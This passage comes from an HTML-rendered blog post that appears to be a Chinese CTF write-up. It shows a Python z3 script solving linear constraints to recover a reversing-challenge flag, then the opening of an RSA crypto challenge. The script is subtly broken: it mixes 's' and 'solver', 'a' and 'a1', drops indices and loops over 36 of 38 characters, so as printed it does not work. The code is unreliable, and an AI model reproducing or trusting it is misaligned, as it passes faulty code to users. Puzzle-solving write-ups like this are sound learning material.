class="string">'a1[15]'</span>)</span><br><span class="line">a1[<span class="number">16</span>]=Int(<span class="string">'a1[16]'</span>)</span><br><span class="line">a1[<span class="number">17</span>]=Int(<span class="string">'a1[17]'</span>)</span><br><span class="line">a1[<span class="number">18</span>]=Int(<span class="string">'a1[18]'</span>)</span><br><span class="line">a1[<span class="number">19</span>]=Int(<span class="string">'a1[19]'</span>)</span><br><span class="line">a1[<span class="number">20</span>]=Int(<span class="string">'a1[20]'</span>)</span><br><span class="line">a1[<span class="number">21</span>]=Int(<span class="string">'a1[21]'</span>)</span><br><span class="line">a1[<span class="number">22</span>]=Int(<span class="string">'a1[22]'</span>)</span><br><span class="line">a1[<span class="number">23</span>]=Int(<span class="string">'a1[23]'</span>)</span><br><span class="line">a1[<span class="number">24</span>]=Int(<span class="string">'a1[24]'</span>)</span><br><span class="line">a1[<span class="number">25</span>]=Int(<span class="string">'a1[25]'</span>)</span><br><span class="line">a1[<span class="number">26</span>]=Int(<span class="string">'a1[26]'</span>)</span><br><span class="line">a1[<span class="number">27</span>]=Int(<span class="string">'a1[27]'</span>)</span><br><span class="line">a1[<span class="number">28</span>]=Int(<span class="string">'a1[28]'</span>)</span><br><span class="line">a1[<span class="number">29</span>]=Int(<span class="string">'a1[29]'</span>)</span><br><span class="line">a1[<span class="number">30</span>]=Int(<span class="string">'a1[30]'</span>)</span><br><span class="line">a1[<span class="number">31</span>]=Int(<span class="string">'a1[31]'</span>)</span><br><span class="line">a1[<span class="number">32</span>]=Int(<span class="string">'a1[32]'</span>)</span><br><span class="line">a1[<span class="number">33</span>]=Int(<span class="string">'a1[33]'</span>)</span><br><span class="line">a1[<span class="number">34</span>]=Int(<span class="string">'a1[34]'</span>)</span><br><span class="line">a1[<span class="number">35</span>]=Int(<span class="string">'a1[35]'</span>)</span><br><span class="line">a1[<span class="number">36</span>]=Int(<span class="string">'a1[36]'</span>)</span><br><span class="line">a1[<span class="number">37</span>]=Int(<span class="string">'a1[37]'</span>)</span><br><span class="line">s = Solver()</span><br><span class="line">s.add(<span class="number">48</span> * a1[<span class="number">7</span>] + (a1[<span class="number">5</span>] << <span class="number">6</span>) + <span class="number">4</span> * a1[<span class="number">4</span>] + <span class="number">59</span> * a1[<span class="number">1</span>] + <span class="number">85</span> *a1 + <span class="number">76</span> * a1[<span class="number">2</span>] + <span class="number">65</span> * a1[<span class="number">3</span>] + <span class="number">50</span> * a1[<span class="number">6</span>] + <span class="number">11</span> * a1[<span class="number">8</span>] + <span class="number">66</span> * a1[<span class="number">9</span>] == <span class="number">44858</span> ) </span><br><span class="line">s.add( <span class="number">96</span> * a1[<span class="number">7</span>]+ <span class="number">6</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">87</span> * a1</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">9</span>] == <span class="number">54177</span> ) </span><br><span class="line">s.add ( <span class="number">82</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">54</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">22</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">27</span> * a1</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">9</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">35</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">36</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">90</span> * a1[<span class="number">9</span>] == <span class="number">40412</span> ) </span><br><span class="line">s.add ( <span class="number">60</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">47</span> * a1</span><br><span class="line"> + <span class="number">32</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">10</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">34</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span class="number">9</span>] == <span class="number">32362</span> ) </span><br><span class="line">s.add( <span class="number">53</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">13</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">72</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">18</span> * a1</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span class="number">9</span>] == <span class="number">37176</span> ) </span><br><span class="line">s.add ( <span class="number">78</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">77</span> * a1</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">8</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">5</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">9</span>] == <span class="number">42742</span> ) </span><br><span class="line">s.add ( <span class="number">62</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">40</span> * a1</span><br><span class="line"> + <span class="number">51</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">24</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">95</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">19</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">9</span>] == <span class="number">47553</span> ) </span><br><span class="line">s.add ( <span class="number">28</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">12</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">88</span> * a1</span><br><span class="line"> + <span class="number">83</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">9</span>] == <span class="number">41059</span> ) </span><br><span class="line">s.add ( <span class="number">41</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">68</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">39</span> * a1</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">14</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">9</span>] == <span class="number">43919</span> ) </span><br><span class="line">s.add( <span class="number">56</span> * a1[<span class="number">8</span>] + <span class="number">74</span> * a1[<span class="number">5</span>] + <span class="number">43</span> * a1[<span class="number">4</span>] + <span class="number">84</span> * a1[<span class="number">3</span>] + <span class="number">44</span> * a1[<span class="number">2</span>] + <span class="number">37</span> * a1 + <span class="number">81</span> * a1[<span class="number">1</span>] + <span class="number">2</span> * a1[<span class="number">6</span>] + <span class="number">21</span> * a1[<span class="number">9</span>] == <span class="number">35933</span> ) </span><br><span class="line">s.add( <span class="number">36</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">79</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">60</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">24</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">78</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">72</span> * a1[<span class="number">19</span>] == <span class="number">47783</span> ) </span><br><span class="line">s.add( <span class="number">74</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">39</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">51</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">8</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">77</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + (a1[<span class="number">18</span>] << <span class="number">6</span>)</span><br><span class="line"> + <span class="number">28</span> * a1[<span class="number">19</span>] == <span class="number">44266</span> ) </span><br><span class="line">s.add( <span class="number">47</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">53</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">66</span> * a1[<span class="number">19</span>] == <span class="number">44988</span> ) </span><br><span class="line">s.add( <span class="number">5</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">4</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">11</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">84</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">65</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">19</span>] == <span class="number">46698</span> ) </span><br><span class="line">s.add( <span class="number">82</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">62</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">85</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">27</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">43</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">19</span>] == <span class="number">45689</span> ) </span><br><span class="line">s.add( <span class="number">22</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">34</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">2</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">48</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">35</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">19</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">19</span>] == <span class="number">27224</span> ) </span><br><span class="line">s.add( <span class="number">96</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">81</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">54</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span class="number">19</span>] == <span class="number">58395</span> ) </span><br><span class="line">s.add( <span class="number">13</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">21</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">59</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">56</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">50</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">41</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">44</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">40</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">19</span>] == <span class="number">40625</span> ) </span><br><span class="line">s.add( <span class="number">12</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">88</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">87</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">68</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">83</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">32</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">37</span> * a1[<span class="number">19</span>] == <span class="number">45008</span> ) </span><br><span class="line">s.add( <span class="number">10</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">18</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">9</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">6</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">76</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">14</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">90</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">19</span>] == <span class="number">32400</span> ) </span><br><span class="line">s.add( <span class="number">83</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">4</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">48</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">22</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">62</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">85</span> * a1[<span class="number">29</span>] == <span class="number">37450</span> ) </span><br><span class="line">s.add( <span class="number">14</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">40</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">76</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">11</span> * a1[<span class="number">29</span>] == <span class="number">48740</span> ) </span><br><span class="line">s.add( <span class="number">72</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">32</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">12</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">84</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">27</span> * a1[<span class="number">29</span>] == <span class="number">53599</span> ) </span><br><span class="line">s.add( <span class="number">53</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">41</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">87</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">81</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">29</span>] == <span class="number">52140</span> ) </span><br><span class="line">s.add ( <span class="number">68</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">28</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">44</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">6</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + (a1[<span class="number">29</span>] << <span class="number">6</span>) == <span class="number">44449</span> )</span><br><span class="line">s.add( <span class="number">9</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">60</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">96</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">10</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">5</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">21</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">29</span>] == <span class="number">35276</span> )</span><br><span class="line">s.add( <span class="number">59</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">66</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">8</span> * (a1[<span class="number">20</span>] + <span class="number">3</span> * a1[<span class="number">21</span>])</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">56</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">90</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">36</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">39</span> * a1[<span class="number">29</span>] == <span class="number">35577</span> ) </span><br><span class="line">s.add( <span class="number">35</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">65</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">88</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">82</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">18</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">37</span> * a1[<span class="number">29</span>] == <span class="number">42004</span> )</span><br><span class="line">s.add( <span class="number">54</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">43</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">74</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">19</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">51</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">13</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">79</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">29</span>] == <span class="number">35802</span> )</span><br><span class="line">s.add( <span class="number">34</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">50</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">78</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">77</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">95</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">2</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">29</span>] == <span class="number">54527</span> )</span><br><span class="line">s.add( <span class="number">46</span> * a1[<span class="number">36</span>] + <span class="number">73</span> * a1[<span class="number">34</span>] + <span class="number">15</span> * a1[<span class="number">30</span>] + <span class="number">16</span> * a1[<span class="number">31</span>] + <span class="number">41</span> * a1[<span class="number">32</span>] + <span class="number">94</span> * a1[<span class="number">33</span>] + <span class="number">28</span> * a1[<span class="number">35</span>] + <span class="number">45</span> * a1[<span class="number">37</span>] == <span class="number">34469</span> )</span><br><span class="line"></span><br><span class="line">s.add( <span class="number">82</span> * a1[<span class="number">36</span>] + <span class="number">10</span> * a1[<span class="number">32</span>] + <span class="number">48</span> * a1[<span class="number">31</span>] + <span class="number">65</span> * a1[<span class="number">30</span>] + <span class="number">6</span> * a1[<span class="number">33</span>] + <span class="number">30</span> * a1[<span class="number">34</span>] + <span class="number">27</span> * a1[<span class="number">35</span>] + <span class="number">32</span> * a1[<span class="number">37</span>] == <span class="number">31558</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">62</span> * a1[<span class="number">36</span>] + <span class="number">39</span> * a1[<span class="number">35</span>] + <span class="number">36</span> * a1[<span class="number">33</span>] + <span class="number">97</span> * a1[<span class="number">31</span>] + <span class="number">52</span> * a1[<span class="number">30</span>] + <span class="number">70</span> * a1[<span class="number">32</span>] + <span class="number">13</span> * a1[<span class="number">34</span>] + <span class="number">66</span> * a1[<span class="number">37</span>] == <span class="number">41820</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">44</span> * a1[<span class="number">34</span>] + <span class="number">42</span> * a1[<span class="number">33</span>] + <span class="number">78</span> * a1[<span class="number">32</span>] + <span class="number">83</span> * a1[<span class="number">31</span>] + <span class="number">96</span> * a1[<span class="number">30</span>] + <span class="number">4</span> * a1[<span class="number">35</span>] + <span class="number">9</span> * a1[<span class="number">36</span>] + <span class="number">51</span> * a1[<span class="number">37</span>] == <span class="number">38668</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">79</span> * a1[<span class="number">36</span>] + <span class="number">37</span> * a1[<span class="number">33</span>] + <span class="number">92</span> * a1[<span class="number">30</span>] + <span class="number">18</span> * a1[<span class="number">31</span>] + <span class="number">86</span> * a1[<span class="number">32</span>] + <span class="number">7</span> * a1[<span class="number">34</span>] + <span class="number">95</span> * a1[<span class="number">37</span>] == <span class="number">45530</span> )</span><br><span class="line"></span><br><span class="line">s.add( <span class="number">71</span> * a1[<span class="number">36</span>] + <span class="number">43</span> * a1[<span class="number">35</span>] + <span class="number">57</span> * a1[<span class="number">34</span>] + <span class="number">49</span> * a1[<span class="number">33</span>] + <span class="number">88</span> * a1[<span class="number">32</span>] + <span class="number">61</span> * a1[<span class="number">30</span>] + <span class="number">24</span> * a1[<span class="number">31</span>] + <span class="number">91</span> * a1[<span class="number">37</span>] == <span class="number">51396</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">34</span> * a1[<span class="number">36</span>] + <span class="number">75</span> * a1[<span class="number">35</span>] + <span class="number">35</span> * a1[<span class="number">32</span>] + <span class="number">23</span> * a1[<span class="number">30</span>] + <span class="number">3</span> * a1[<span class="number">31</span>] + <span class="number">53</span> * a1[<span class="number">33</span>] + <span class="number">14</span> * a1[<span class="number">34</span>] + <span class="number">47</span> * a1[<span class="number">37</span>] == <span class="number">28874</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">22</span> * a1[<span class="number">36</span>] + <span class="number">84</span> * a1[<span class="number">35</span>] + <span class="number">26</span> * a1[<span class="number">34</span>] + <span class="number">90</span> * a1[<span class="number">33</span>] + <span class="number">99</span> * a1[<span class="number">30</span>] + <span class="number">98</span> * a1[<span class="number">31</span>] + <span class="number">25</span> * a1[<span class="number">32</span>] + a1[<span class="number">37</span>]==<span class="number">38231</span> )</span><br><span class="line"></span><br><span class="line">solver.check()</span><br><span class="line">result = solver.model()</span><br><span class="line"> </span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">36</span>):</span><br><span class="line"> flag += chr(result[a[i]].as_long().real)</span><br><span class="line"><span class="keyword">print</span> (flag)</span><br></pre></td></tr></table></figure></div><h3 id=""><a href="#" class="headerlink" title=""></a><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/27/aEDdyTbFmQ46Wxw.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/27/Q9CsiBqEcPeFYgJ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="名字没想好"><a href="#名字没想好" class="headerlink" title="名字没想好"></a>名字没想好</h3><p>前一部分</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"></span><br><span class="line">e = <span class="number">103738</span></span><br><span class="line"><span class="comment"># e = 2*27361</span></span><br><span class="line">n = <span class="number">24511956296934419790810802924028121267308277322350201914243748724443965915830044792139346496470216715543376102606906727287935669186132061565360428924230740995935556111187855700300365517739695893842582114724005232045077425187550801509268664723237890122110051088839310003135672964413501812829310021228720112275276180469100308793523051405119335989674132224715582989624204590983857159312466387546505666052162775188773736419909262619409755848412558718676873188073997893894862353873441073313610102773845304906678909624700529896455885309546409645526387707907518497436045821973310653257012148438207441605902771515486273283273</span></span><br><span 